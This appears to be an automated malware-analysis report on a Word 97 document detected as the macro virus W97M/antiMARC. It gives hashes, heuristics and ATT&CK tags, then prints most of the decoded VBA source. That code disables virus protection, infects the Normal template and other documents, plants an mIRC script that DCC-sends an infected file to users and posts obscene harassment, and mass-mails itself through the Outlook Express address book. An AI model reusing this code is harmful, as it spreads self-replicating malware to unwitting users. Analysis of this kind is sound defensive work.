Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3b7234df28faefb3…

MALICIOUS

Office (OLE)

64.0 KB Created: 2001-02-27 07:58:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4fcc929a51db410b5ea9fe89399bedf0 SHA-1: 7f305b6fd8a38259a116c79e03b520b3b6eeee7d SHA-256: 3b7234df28faefb3695568daf25ff250dbaa4e31dafd749030ca5eb6da6bfed5
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros. The macro attempts to export itself to the system directory as 'microsof.386' and uses the Shell() function, indicating an attempt to execute code. The presence of VBA macros and the use of Shell() strongly suggest a macro-based downloader or dropper, commonly delivered via spearphishing attachments.

Heuristics 5

  • ClamAV: Doc.Trojan.Antimarc-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Antimarc-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www2.pokemon.com/pokedex/images/pixel.gif In document text (OLE body)
    • http://www2.pokemon.com/pokedex/images/top_ash.gifIn document text (OLE body)
    • http://www2.pokemon.com/pokedex/images/top_000b.gifIn document text (OLE body)
    • http://www2.pokemon.com/pokedex/images/title_ash.gifIn document text (OLE body)
    • http://www2.pokemon.com/pokedex/images/tm2.gifIn document text (OLE body)
    • http://www2.pokemon.com/pokedex/images/stat.gifIn document text (OLE body)
    • http://www2.pokemon.com/pokedex/images/char_ash.gifIn document text (OLE body)
    • http://www2.pokemon.com/pokedex/images/bottom_000a.gifIn document text (OLE body)
    • http://www2.pokemon.com/pokedex/images/bottom_000b.gifIn document text (OLE body)
    • http://www2.pokemon.com/pokedex/images/bottom_000c.gifIn document text (OLE body)
    • http://www2.pokemon.com/pokedex/images/pokedex_small.gifIn document text (OLE body)
    • http://www.nintendo.com/copyright.htmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16415 bytes
SHA-256: 745c9cce253336b439fb3148e8c4bd03a8152f50eefd76f7cb580f2ff350541a
Detection
ClamAV: Doc.Trojan.Antimarc-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1HTML.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "HTMLSelect1, 0, 0, MSForms, HTMLSelect"

Attribute VB_Name = "antiMARC"
Sub antiMARC()
'W97M/antiMARC by Lord Natas [Codebreakers 98]
'with special thanks to Rhape79
'"We're just the toys in the hands of another"
On Error Resume Next
Application.EnableCancelKey = 0
Application.DisplayAlerts = 0
WordBasic.DisableAutoMacros = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
Options.SavePropertiesPrompt = 0
Options.ConfirmConversions = 0
WinDir = Environ("WINDIR") & "\"
Application.VBE.ActiveVBProject.VBComponents("antiMARC").Export WinDir & "system\microsof.386"
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "antiMARC" Then a = -1
Next i
For J = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(J).Name = "antiMARC" Then b = -1
Next J
If a = 0 Then
NormalTemplate.VBProject.VBComponents.Import WinDir & "system\microsof.386"
NormalTemplate.Save
End If
If b = 0 Then
ActiveDocument.VBProject.VBComponents.Import WinDir & "system\microsof.386"
If Left(ActiveDocument.Name, 8) <> "Document" And Left(ActiveDocument.Name, 8) <> "Template" Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End If
End If
randomize
If Int(Rnd() * 1024) = 666 Then Call mIRCDropper
If Int(Rnd() * 1024) = 666 + 6 Then Call OE
End Sub
Private Sub mIRCDropper()
On Error Resume Next
If Dir("C:\mirc\mirc32.exe") = "" Then GoTo NomIRC
m = System.PrivateProfileString("C:\mirc\mirc.ini", "warn", "fserve")
If m <> "" Then System.PrivateProfileString("C:\mirc\mirc.ini", "warn", "fserve") = "off"
m = System.PrivateProfileString("C:\mirc\mirc.ini", "fileserver", "Warning")
If m <> "" Then System.PrivateProfileString("C:\mirc\mirc.ini", "fileserver", "Warning") = "Off"
Open "C:\mirc\script.ini" For Output As #1
Print #1, "[script]"
Print #1, "n0=on 1:CONNECT: {"
Print #1, "n1=/msg marc FuCk YoU FaScIsT"
Print #1, "n2=/msg warblade STILL SUCKING MARC's COCK?? eh, sure you do!!"
Print #1, "n3=/msg super Hey M0therfux0r, shove X/W up yer fat pimple-covered ass!"
Print #1, "n4=/msg super 'We do not support the distribution of virii' - i guess you do now, bitch!"
Print #1, "n5=/msg #gotinfected777 Kick Me! - I'm InFeCtEd!"
Print #1, "n6=}"
Print #1, "n7=on 1:JOIN:#: if ( $me != $nick) { /dcc send $nick c:\windows\xxxpasswords.doc }"
Print #1, "n8=on 1:TEXT:*marcsux*:#: {"
Print #1, "n9=/ctcp $nick X"
Print #1, "n10=/msg #gotinfected777 X"
Print #1, "n11=}"
Print #1, "n12=on 1:TEXT:marcisalamer*:?:{ s *2 | halt }"
Print #1, "n13=alias /s / *1"
Close #1
ActiveDocument.Save
ActiveDocument.SaveAs FileName:="c:\windows\xxxpasswords.doc", AddToRecentFiles:=False
Application.Quit SaveChanges:=wdDoNotSaveChanges
NomIRC:
End Sub
Private Sub OE()
On Error Resume Next
For i = 1 To 8
randomize
Temp = Temp + Chr$(Int(Rnd() * (90 - 65) + 65))
Next
sName = "C:\" + Temp + ".DOC"
ActiveDocument.SaveAs FileName:=sName
For Each myTask In Tasks
If InStr(myTask.Name, "Address Book") > 0 Then
myTask.Activate (0)
Call Delay
GoTo NextShit
End If
Next myTask
oeFile = "C:\Program Files\Outlook Express\wab.exe"
If Dir(oeFile) <> "" Then
Shell oeFile, 4
GoTo NextShit
End If
GoTo NoOE
NextShit:
t = "Address Book - (C:\WINDOWS\Application Data\Microsoft\Address Book\UserMPS.wab)"
loop1:
If Tasks.Exists(t) = False Then GoTo loop1
Call Delay
SendKeys "{TAB}", -1
SendKeys "+({DOWN 20})", -1
SendKeys "%T", -1
SendKeys "M", -1
loop2:
If Tasks.Exists("New Message") = False Then GoTo loop2
Call Delay
SendKeys "{TAB}", -1
SendKeys "{TAB}", -1
SendKeys "{TAB}", -1
randomize
For i = 1 To Int(Rnd() * (35 - 1) + 1)
If Rnd() < Rnd() Then
R = R + Chr$(Int(Rnd() * (122 - 97) + 97))
Else
R = R + Chr$(I
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.